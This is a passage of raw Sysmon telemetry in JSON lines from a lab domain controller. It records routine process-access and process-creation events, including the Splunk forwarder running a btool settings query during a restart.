C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.228","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2843,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.228\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-0010B8FD0400}\r\nTargetProcessId: 4932\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.228","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-0010B8FD0400}","TargetProcessId":"4932","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2844,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.243\r\nProcessGuid: {A837DB8D-0236-5F25-0000-0010ECFE0400}\r\nProcessId: 4948\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-0236-5F25-0000-0010B8FD0400}\r\nParentProcessId: 4932\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=3088","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.243","ProcessGuid":"{A837DB8D-0236-5F25-0000-0010ECFE0400}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-0236-5F25-0000-0010B8FD0400}","ParentProcessId":"4932","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=3088","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2845,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.228\r\nSourceProcessGUID: {A837DB8D-0236-5F25-0000-0010B8FD0400}\r\nSourceProcessId: 4932\r\nSourceThreadId: 4940\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-0010ECFE0400}\r\nTargetProcessId: 4948\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+146d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d8a0|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.228","SourceProcessGUID":"{A837DB8D-0236-5F25-0000-0010B8FD0400}","SourceProcessId":"4932","SourceThreadId":"4940","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-0010ECFE0400}","TargetProcessId":"4948","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+146d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d8a0|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2846,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.228\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-0010ECFE0400}\r\nTargetProcessId: 4948\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.228","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-0010ECFE0400}","TargetProcessId":"4948","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2847,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.228\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.228","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2848,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.228\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.228","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2849,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.228\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.228","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2850,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.228\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.228","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2851,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: 